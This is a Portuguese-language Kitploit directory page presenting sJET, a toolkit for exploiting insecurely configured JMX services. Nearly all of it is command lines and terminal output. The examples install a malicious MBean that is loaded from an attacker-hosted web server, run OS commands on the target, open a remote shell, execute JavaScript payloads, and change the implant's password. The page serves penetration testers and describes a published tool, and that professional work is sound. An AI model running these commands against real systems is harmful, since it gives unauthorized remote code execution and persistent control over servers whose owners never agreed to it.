Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
sjet — siberas kit de ferramentas de exploração JMX | Kitploit
Ferramentas/GitHubGitHub/siberas/sjet
Geração de PayloadsExploraçãoComando e ControleFerramenta de Acesso Remoto
GitHubsiberas/sjet

sjet

siberas kit de ferramentas de exploração JMX

Ver Repositório
13391há 5 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

sJET por siberas

siberas JMX Exploitation Toolkit

O sJET permite uma fácil exploração de serviços JMX configurados de forma insegura. Informações adicionais de fundo podem ser encontradas aqui e aqui.

Pré-requisitos

  • Jython 2.7

Utilização

O SJET implementa uma interface CLI (usando argparse):

root@kitploit:~
jython sjet.py targetHost targetPort password MODE (modeOptions)

Onde

  • targetHost - o endereço IP do alvo
  • targetPort - a porta do alvo onde o JMX está a correr
  • password - a palavra-passe que está/foi definida durante a instalação
  • MODE - o modo do script
  • modeOptions - as opções para o modo selecionado

Modos e modeOptions

  • install - instala a payload no alvo atual
    • payload_url - URL completo para carregar a payload
    • payload_port - porta para carregar a payload
  • uninstall - desinstala a payload do alvo atual
  • password - altera a palavra-passe numa payload já implementada
    • password - a nova palavra-passe
  • command - executa o comando CMD no targetHost
    • CMD - o comando a executar
  • shell - inicia uma shell simples no targetHost (com as limitações do java Runtime.exec())
  • javascript - executa um ficheiro JavaScript FILENAME no targetHost
    • FILENAME - o JavaScript a ser executado

Exemplo

Instalar o MBean da payload num serviço JMX vulnerável

No exemplo seguinte, o serviço JMX vulnerável corre no 192.168.11.136:9991, o atacante tem o endereço IP 192.168.11.132. O serviço JMX vai conectar-se ao serviço web do atacante para descarregar o ficheiro JAR da payload. O sJET irá iniciar o serviço web necessário na porta 8000.

Após a instalação bem-sucedida do MBean, a palavra-passe padrão é alterada para a palavra-passe que foi fornecida na linha de comandos ("super_secret").

root@kitploit:~
h0ng10@rocksteady:~/sjet$ jython sjet.py 192.168.11.136 9991 super_secret install http://192.168.11.132:8000 8000
sJET - siberas JMX Exploitation Toolkit
=======================================
[+] Starting webserver at port 8000
[+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.11.136:9991/jmxrmi
[+] Connected: rmi://192.168.11.132  1
[+] Loaded javax.management.loading.MLet
[+] Loading malicious MBean from http://192.168.11.132:8000
[+] Invoking: javax.management.loading.MLet.getMBeansFromURL
192.168.11.136 - - [22/Aug/2017 22:38:00] "GET / HTTP/1.1" 200 -
192.168.11.136 - - [22/Aug/2017 22:38:00] "GET /siberas_mlet.jar HTTP/1.1" 200 -
[+] Successfully loaded MBeanSiberas:name=payload,id=1
[+] Changing default password...
[+] Loaded de.siberas.lab.SiberasPayload
[+] Successfully changed password

h0ng10@rocksteady:~/sjet$

Executar o comando 'ls -la' num alvo Linux:

Após a payload estar instalada, podemos usá-la para executar comandos do SO no alvo.

root@kitploit:~
h0ng10@rocksteady:~/sjet$ jython sjet.py 192.168.11.136 9991 super_secret command "ls -la"
sJET - siberas JMX Exploitation Toolkit
=======================================
[+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.11.136:9991/jmxrmi
[+] Connected: rmi://192.168.11.132  2
[+] Loaded de.siberas.lab.SiberasPayload
[+] Executing command: ls -la
total 16
drwxr-xr-x  4 root    root    4096 Aug 22 16:12 .
drwxr-xr-x 66 root    root    4096 Aug 22 16:12 ..
lrwxrwxrwx  1 root    root      12 Mär 29 01:46 conf -> /etc/tomcat8
drwxr-xr-x  2 tomcat8 tomcat8 4096 Mär 29 01:46 lib
lrwxrwxrwx  1 root    root      17 Mär 29 01:46 logs -> ../../log/tomcat8
drwxrwxr-x  3 tomcat8 tomcat8 4096 Aug 22 16:12 webapps
lrwxrwxrwx  1 root    root      19 Mär 29 01:46 work -> ../../cache/tomcat8


[+] Done
h0ng10@rocksteady:~/sjet$

Executar ping no modo shell num alvo

Se não quiser carregar Java para cada comando, pode usar o "modo shell" para obter uma shell de comandos limitada.

root@kitploit:~
h0ng10@rocksteady:~/sjet$ jython sjet.py 192.168.11.136 9991 super_secret shell
sJET - siberas JMX Exploitation Toolkit
=======================================
[+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.11.136:9991/jmxrmi
[+] Connected: rmi://192.168.11.132  3
[+] Use command 'exit_shell' to exit the shell
>>> ping -c 3 127.0.0.1
[+] Loaded de.siberas.lab.SiberasPayload
[+] Executing command: ping -c 3 127.0.0.1
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.075 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.046 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.044 ms

--- 127.0.0.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2050ms
rtt min/avg/max/mdev = 0.044/0.055/0.075/0.014 ms


>>> exit_shell
[+] Done
h0ng10@rocksteady:~/sjet$

Invocar uma payload JavaScript num alvo:

O script de exemplo "javaproperties.js" exibe as propriedades Java do serviço vulnerável. Pode ser invocado da seguinte forma:

root@kitploit:~
h0ng10@rocksteady:~/sjet$ jython sjet.py 192.168.11.136 9991 super_secret javascript scripts/javaproperties.js
sJET - siberas JMX Exploitation Toolkit
=======================================
[+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.11.136:9991/jmxrmi
[+] Connected: rmi://192.168.11.132  4
[+] Loaded de.siberas.lab.SiberasPayload
[+] Executing script
java.vendor=Oracle Corporation
sun.java.launcher=SUN_STANDARD
catalina.base=/var/lib/tomcat8
sun.management.compiler=HotSpot 64-Bit Tiered Compilers
catalina.useNaming=true
os.name=Linux
...
java.vm.name=OpenJDK 64-Bit Server VM
file.encoding=UTF-8
java.specification.version=1.8


h0ng10@rocksteady:~/sjet$

Alterar a palavra-passe

Alterar a palavra-passe existente ("super_secret") para "this-is-the-new-password":

root@kitploit:~
h0ng10@rocksteady:~/sjet$ jython sjet.py 192.168.11.136 9991 super_secret password this-is-the-new-password
sJET - siberas JMX Exploitation Toolkit
=======================================
[+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.11.136:9991/jmxrmi
[+] Connected: rmi://192.168.11.132  6
[+] Loaded de.siberas.lab.SiberasPayload
[+] Successfully changed password

[+] Done
h0ng10@rocksteady:~/sjet$

Desinstalar o MBean da payload do alvo

Desinstalar a payload 'Siberas' do alvo:

root@kitploit:~
minmaxer@prellermbp:~/sjet$ jython sjet.py 192.168.1.101 9010 super_secret uninstall
sJET - siberas JMX Exploitation Toolkit
=======================================
[+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.1.101:9010/jmxrmi
[+] Connected: rmi://192.168.1.1  16
[+] MBean correctly uninstalled
minmaxer@prellermbp:~/sjet$

Contribuir

Sinta-se à vontade para contribuir.

Autores

  • Hans-Martin Münch - Ideia inicial e trabalho - h0ng10
  • Patricio Reller - CLI e opções extra - preller

Veja também a lista de contribuidores que participaram neste projeto.

Licença

Este projeto está licenciado sob a Licença MIT - consulte o ficheiro LICENSE para obter detalhes.

Baixar ferramenta